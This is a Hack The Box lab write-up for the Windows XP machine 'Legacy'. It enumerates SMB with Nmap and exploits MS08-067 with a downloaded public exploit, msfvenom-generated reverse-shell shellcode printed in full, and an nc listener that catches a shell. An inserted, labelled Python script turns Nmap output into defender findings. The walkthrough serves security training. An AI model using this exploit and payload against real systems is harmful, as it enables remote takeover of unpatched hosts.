Welcome to the Legacy writeup from HTB
I hope you enjoy reading it. Any feedback will be appreciated! @x4v1l0k
Legacy
tags: HTB, Easy, Windows, OSCP
Platform: Hackthebox
Difficulty: Easy
OS: Windows
Enumeration
Nmap
To get started, we run a quick open ports scan.
$ nmap -Pn -T5 -p- 10.10.10.4
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-03 18:00 CEST
Nmap scan report for 10.10.10.4
Host is up (0.089s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp closed ms-wbt-server
Nmap done: 1 IP address (1 host up) scanned in 119.79 seconds
Now that we know the open ports, let's scan them in depth.
$ nmap -A -Pn -p 139,445,3389 10.10.10.4
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-03 18:02 CEST
Nmap scan report for 10.10.10.4
Host is up (0.086s latency).
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Device type: general purpose|specialized
Running (JUST GUESSING): Microsoft Windows XP|2003|2000 (91%), General Dynamics embedded (88%)
OS CPE: cpe:/o:microsoft:windows_xp cpe:/o:microsoft:windows_server_2003 cpe:/o:microsoft:windows_2000::sp4
Aggressive OS guesses: Microsoft Windows XP SP2 or Windows Small Business Server 2003 (91%), Microsoft Windows 2000 SP4 or Windows XP SP2 or SP3 (91%), Microsoft Windows XP SP2 (91%), Microsoft Windows XP SP2 or SP3 (90%), Microsoft Windows XP SP3 (90%), Microsoft Windows XP SP2 or Windows Server 2003 (90%), Microsoft Windows 2000 Server (89%), Microsoft Windows Server 2003 (89%), Microsoft Windows 2000 SP4 (89%), Microsoft Windows XP Professional SP3 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Host script results:
|_clock-skew: mean: -4h24m22s, deviation: 2h07m16s, median: -5h54m22s
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:ef:ce (VMware)
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: legacy
| NetBIOS computer name: LEGACY\x00
| Workgroup: HTB\x00
|_ System time: 2021-08-03T16:08:19+03:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
TRACEROUTE (using port 3389/tcp)
HOP RTT ADDRESS
1 86.43 ms 10.10.14.1
2 86.41 ms 10.10.10.4
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 62.37 seconds
After trying to extract information with rpcinfo and enum4linux without getting anything interesting, we look for vulnerabilities with Nmap's vuln scripts.
$ nmap -A -Pn -p 139,445,3389 10.10.10.4 --script vuln
[...]
| smb-vuln-ms08-067:
| VULNERABLE:
| Microsoft Windows system vulnerable to remote code execution (MS08-067)
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2008-4250
| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
| code via a crafted RPC request that triggers the overflow during path canonicalization.
|
| Disclosure date: 2008-10-23
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_ https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
[...]
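The two scans above already contain everything a defender needs to triage this host: an end-of-life OS CPE, SMB signing disabled, an SMB2 negotiation failure (SMBv1 only) and a vuln script reporting a VULNERABLE state. The script below is an added example, not part of this writeup or of Nmap; it parses the "Host script results" block of a greppable-as-text Nmap report and turns those facts into prioritised findings. The sample scan text is a constructed excerpt modelled on the output shown above, and the end-of-life OS list is an assumption made for the example.

```python
"""Turn Nmap SMB host-script output into prioritised defender findings.

Added example (not from the writeup or from Nmap). SAMPLE_SCAN is a constructed
excerpt modelled on the -A and --script vuln output shown in the writeup.
"""
import re

# Constructed sample: Nmap's real indentation (one space for script headers,
# three or more for nested keys) is preserved because the parser relies on it.
SAMPLE_SCAN = """\
Host script results:
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-vuln-ms08-067:
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2008-4250
"""

# Assumed list of Microsoft OS CPE product names that no longer receive patches.
END_OF_LIFE_OS = ("windows_2000", "windows_xp", "windows_server_2003")

# A script header looks like '| smb-os-discovery:' or '|_smb2-time: value';
# nested key lines have at least two more spaces after the bar and never match.
HEADER_RE = re.compile(r"^\|_?\s?([a-z0-9][a-z0-9-]*):\s*(.*)$")


def parse_host_scripts(text):
    """Return {script_name: [lines]} for every NSE script block in the report."""
    scripts = {}
    current = None
    for raw in text.splitlines():
        header = HEADER_RE.match(raw)
        if header:
            current = header.group(1)
            scripts[current] = []
            if header.group(2):            # one-line scripts keep their value
                scripts[current].append(header.group(2))
        elif current and raw.startswith("|"):
            scripts[current].append(re.sub(r"^\|_?\s*", "", raw))
    return scripts


def assess(scripts):
    """Map parsed script output to (severity, message) findings."""
    findings = []
    os_block = "\n".join(scripts.get("smb-os-discovery", []))
    for product in sorted(set(re.findall(r"cpe:/o:microsoft:([a-z0-9_]+)", os_block))):
        if product in END_OF_LIFE_OS:
            findings.append(("critical", f"end-of-life OS reported via SMB: {product}"))
    sec = "\n".join(scripts.get("smb-security-mode", []))
    if re.search(r"message_signing:\s*disabled", sec):
        findings.append(("high", "SMB message signing disabled (relay/tampering risk)"))
    if re.search(r"account_used:\s*guest", sec):
        findings.append(("medium", "SMB accepts guest/null sessions"))
    if "negotiation failed" in "\n".join(scripts.get("smb2-time", [])):
        findings.append(("high", "SMB2 negotiation failed: host speaks SMBv1 only"))
    for name, lines in scripts.items():
        if not name.startswith("smb-vuln-"):
            continue
        block = "\n".join(lines)
        state = re.search(r"State:\s*(.+)", block)
        # Nmap reports NOT VULNERABLE, LIKELY VULNERABLE or VULNERABLE [...]
        if state and "VULNERABLE" in state.group(1) and "NOT" not in state.group(1):
            cves = ", ".join(re.findall(r"CVE-\d{4}-\d+", block)) or "no CVE listed"
            findings.append(("critical", f"{name}: {state.group(1).strip()} ({cves})"))
    return findings


def scan_findings(text):
    """Convenience wrapper: report text in, sorted findings out."""
    order = {"critical": 0, "high": 1, "medium": 2}
    return sorted(assess(parse_host_scripts(text)), key=lambda f: order[f[0]])


if __name__ == "__main__":
    for severity, message in scan_findings(SAMPLE_SCAN):
        print(f"[{severity:8}] {message}")
```

Feed it the text of a saved `-oN` report (or the output captured above) and it prints, in severity order, the items that would go on a remediation ticket: the unsupported OS first, then signing and SMBv1, then guest access. The parser keys on Nmap's own indentation, so copy the report verbatim rather than from a rendered page that has collapsed the leading spaces.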
Searching the internet for the CVE-2008-4250 vulnerability, we can find this exploit.
Exploitation
$ wget -O ms08_067_netapi.py https://www.exploit-db.com/download/40279
$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.29 LPORT=8787 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f python | sed 's/buf /shellcode /g'
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai failed with A valid opcode permutation could not be found.
Attempting to encode payload with 1 iterations of generic/none
generic/none failed with Encoding failed due to a bad character (index=3, char=0x00)
Attempting to encode payload with 1 iterations of x86/call4_dword_xor
x86/call4_dword_xor succeeded with size 348 (iteration=0)
x86/call4_dword_xor chosen with final size 348
Payload size: 348 bytes
Final size of python file: 1700 bytes
shellcode = b""
shellcode += b"\x31\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81"
shellcode += b"\x76\x0e\x92\xaa\xf9\x92\x83\xee\xfc\xe2\xf4\x6e\x42"
shellcode += b"\x7b\x92\x92\xaa\x99\x1b\x77\x9b\x39\xf6\x19\xfa\xc9"
shellcode += b"\x19\xc0\xa6\x72\xc0\x86\x21\x8b\xba\x9d\x1d\xb3\xb4"
shellcode += b"\xa3\x55\x55\xae\xf3\xd6\xfb\xbe\xb2\x6b\x36\x9f\x93"
shellcode += b"\x6d\x1b\x60\xc0\xfd\x72\xc0\x82\x21\xb3\xae\x19\xe6"
shellcode += b"\xe8\xea\x71\xe2\xf8\x43\xc3\x21\xa0\xb2\x93\x79\x72"
shellcode += b"\xdb\x8a\x49\xc3\xdb\x19\x9e\x72\x93\x44\x9b\x06\x3e"
shellcode += b"\x53\x65\xf4\x93\x55\x92\x19\xe7\x64\xa9\x84\x6a\xa9"
shellcode += b"\xd7\xdd\xe7\x76\xf2\x72\xca\xb6\xab\x2a\xf4\x19\xa6"
shellcode += b"\xb2\x19\xca\xb6\xf8\x41\x19\xae\x72\x93\x42\x23\xbd"
shellcode += b"\xb6\xb6\xf1\xa2\xf3\xcb\xf0\xa8\x6d\x72\xf5\xa6\xc8"
shellcode += b"\x19\xb8\x12\x1f\xcf\xc2\xca\xa0\x92\xaa\x91\xe5\xe1"
shellcode += b"\x98\xa6\xc6\xfa\xe6\x8e\xb4\x95\x55\x2c\x2a\x02\xab"
shellcode += b"\xf9\x92\xbb\x6e\xad\xc2\xfa\x83\x79\xf9\x92\x55\x2c"
shellcode += b"\xc2\xc2\xfa\xa9\xd2\xc2\xea\xa9\xfa\x78\xa5\x26\x72"
shellcode += b"\x6d\x7f\x6e\xf8\x97\xc2\xf3\x98\x9c\xb7\x91\x90\x92"
shellcode += b"\x88\xaa\x1b\x74\xc0\xe9\xc4\xc5\xc2\x60\x37\xe6\xcb"
shellcode += b"\x06\x47\x17\x6a\x8d\x9e\x6d\xe4\xf1\xe7\x7e\xc2\x09"
shellcode += b"\x27\x30\xfc\x06\x47\xfa\xc9\x94\xf6\x92\x23\x1a\xc5"
shellcode += b"\xc5\xfd\xc8\x64\xf8\xb8\xa0\xc4\x70\x57\x9f\x55\xd6"
shellcode += b"\x8e\xc5\x93\x93\x27\xbd\xb6\x82\x6c\xf9\xd6\xc6\xfa"
shellcode += b"\xaf\xc4\xc4\xec\xaf\xdc\xc4\xfc\xaa\xc4\xfa\xd3\x35"
shellcode += b"\xad\x14\x55\x2c\x1b\x72\xe4\xaf\xd4\x6d\x9a\x91\x9a"
shellcode += b"\x15\xb7\x99\x6d\x47\x11\x19\x8f\xb8\xa0\x91\x34\x07"
shellcode += b"\x17\x64\x6d\x47\x96\xff\xee\x98\x2a\x02\x72\xe7\xaf"
shellcode += b"\x42\xd5\x81\xd8\x96\xf8\x92\xf9\x06\x47"
The exploit's comments say to generate 30 NOPs for a 380-byte payload. Our payload is 348 bytes, so to keep the same total length we generate 62 NOPs (380 - 348 + 30) instead of 30.
$ python -c'print "shellcode += b\""+"\\x90"*62+"\""'
shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
Now we start a listener in another terminal and run the exploit.
$ python ms08_067_netapi.py 10.10.10.4 7
#######################################################################
# MS08-067 Exploit
# This is a modified verion of Debasis Mohanty's code (https://www.exploit-db.com/exploits/7132/).
# The return addresses and the ROP parts are ported from metasploit module exploit/windows/smb/ms08_067_netapi
#######################################################################
Windows XP SP3 English (AlwaysOn NX)
[-]Initiating connection
[-]connected to ncacn_np:10.10.10.4[\pipe\browser]
Exploit finish
And we have shell!
$ nc -lnvp 8787
listening on [any] 8787 ...
connect to [10.10.14.29] from (UNKNOWN) [10.10.10.4] 1036
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
And now we can read the user and root flags.
C:\Documents and Settings\john\Desktop>type user.txt
type user.txt
CENSORED_FLAG
C:\Documents and Settings\Administrator\Desktop>type root.txt
type root.txt
CENSORED_FLAG